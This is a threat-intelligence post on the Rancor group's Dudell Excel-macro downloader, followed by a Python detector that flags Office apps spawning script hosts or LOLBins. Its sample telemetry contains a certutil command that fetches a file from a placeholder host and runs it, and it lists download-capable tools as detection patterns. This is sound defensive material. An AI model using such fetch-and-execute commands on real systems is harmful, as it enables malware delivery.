Rancor: Rancor, a threat group believed to operate out of China and tracked by Palo Alto Networks’ Unit 42, is back with new custom malware dubbed Dudell. Unit 42 assesses that Dudell was used in attacks between December 2018 and January 2019 against Cambodian government organizations. The sample Unit 42 analyzed shares characteristics with other malware attributed to Rancor that was used against other Southeast Asian governments. Dudell is a downloader delivered as a Microsoft Excel document: its malicious macros run when the document is opened and drop the second-stage payload.
The group has been active since 2017, carrying out cyber espionage campaigns against entities in Southeast Asia. Unit 42 also observed Rancor using a variant of the Derusbi malware family as a loader for secondary payloads once a victim’s machine has been compromised. Binary Defense analysts frequently find that the initial attack vector in serious intrusions is a macro-enabled Microsoft Excel or Word file delivered as an attachment or link in a phishing email. Behavior-based endpoint monitoring across the organization, for example alerting when an Office application spawns a command shell, script host, or other download-capable utility, lets defenders detect the intrusion at the macro stage and isolate the affected host before the second-stage payload spreads across the network. The full Unit 42 Rancor report can be found here: https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/
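The following is an added example of the kind of behavior-based endpoint detection described above; it is not code from the Unit 42 report or from Binary Defense. It scans Sysmon-style process-creation records (the field names ParentImage, Image, CommandLine and UtcTime are assumed to follow Sysmon Event ID 1) for Office applications spawning script hosts or download-capable utilities, and rates an alert higher when the child’s command line carries a download indicator. The four telemetry records are constructed for this example.

```python
# Added example: "Office application spawns script host / LOLBin" detection over
# Sysmon-style process-creation records. Not from the Unit 42 report or Binary Defense.
# Field names (ParentImage, Image, CommandLine, UtcTime) are an assumption based on
# Sysmon Event ID 1; the sample events below are constructed, not real captures.
import json
import re
from dataclasses import dataclass
from typing import List, Optional

# Office hosts that execute VBA macros. Matching is case-insensitive on the basename.
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}

# Children a macro-based downloader typically launches; legitimate documents almost
# never need these. Baseline per environment and extend the set as needed.
SCRIPT_AND_LOLBIN_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe",
}

# Command-line fragments suggesting a second-stage download rather than a local action.
DOWNLOAD_PATTERN = re.compile(
    r"https?://|downloadstring|downloadfile|invoke-webrequest|\biwr\b|urlcache|bitsadmin.*transfer",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Alert:
    utc_time: str
    parent: str
    child: str
    command_line: str
    severity: str  # "high" when a download indicator is present, else "medium"


def basename(image: str) -> str:
    """Lower-case file name from a Windows- or POSIX-style path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> Optional[Alert]:
    """Return an Alert if an Office host spawned a script host or LOLBin, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_HOSTS or child not in SCRIPT_AND_LOLBIN_CHILDREN:
        return None
    cmdline = event.get("CommandLine", "")
    severity = "high" if DOWNLOAD_PATTERN.search(cmdline) else "medium"
    return Alert(event.get("UtcTime", ""), parent, child, cmdline, severity)


def scan(jsonl: str) -> List[Alert]:
    """Run evaluate() over newline-delimited JSON events, skipping blank or malformed lines."""
    alerts: List[Alert] = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # telemetry pipelines do emit partial lines; do not crash on them
        alert = evaluate(event)
        if alert is not None:
            alerts.append(alert)
    return alerts


# Constructed sample telemetry: four Sysmon-style Event ID 1 records (not real captures).
# Record 1: Excel -> cmd.exe pulling a file from a URL (the Dudell-style pattern).
# Record 2: Excel -> splwow64.exe, a benign print-spooler helper, must not alert.
# Record 3: explorer.exe -> powershell.exe, an admin script outside Office, not this rule.
# Record 4: Word -> wscript.exe running a dropped .vbs, no download indicator.
SAMPLE_EVENTS = r"""
{"UtcTime":"2019-01-08 03:14:07.001","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c certutil -urlcache -split -f http://example.invalid/update.dat %TEMP%\\update.dat && %TEMP%\\update.dat"}
{"UtcTime":"2019-01-08 03:14:09.550","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","Image":"C:\\Windows\\splwow64.exe","CommandLine":"C:\\Windows\\splwow64.exe 12288"}
{"UtcTime":"2019-01-08 03:15:41.213","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -NoProfile -File C:\\Users\\user\\scripts\\backup.ps1"}
{"UtcTime":"2019-01-08 03:16:02.880","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","Image":"C:\\Windows\\System32\\wscript.exe","CommandLine":"wscript.exe //E:vbscript C:\\Users\\user\\AppData\\Local\\Temp\\inv.vbs"}
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.utc_time} {a.parent} -> {a.child}: {a.command_line}")
```

Running the block prints two alerts: a high-severity one for the Excel-to-cmd.exe download chain and a medium one for the Word-to-wscript.exe launch; the splwow64.exe and explorer.exe-parented events are ignored. The parent/child check rather than a hash or filename is the point: it fires on the behaviour Dudell-style macro downloaders share regardless of which second stage they fetch, which is what lets a response team quarantine the host before that payload runs.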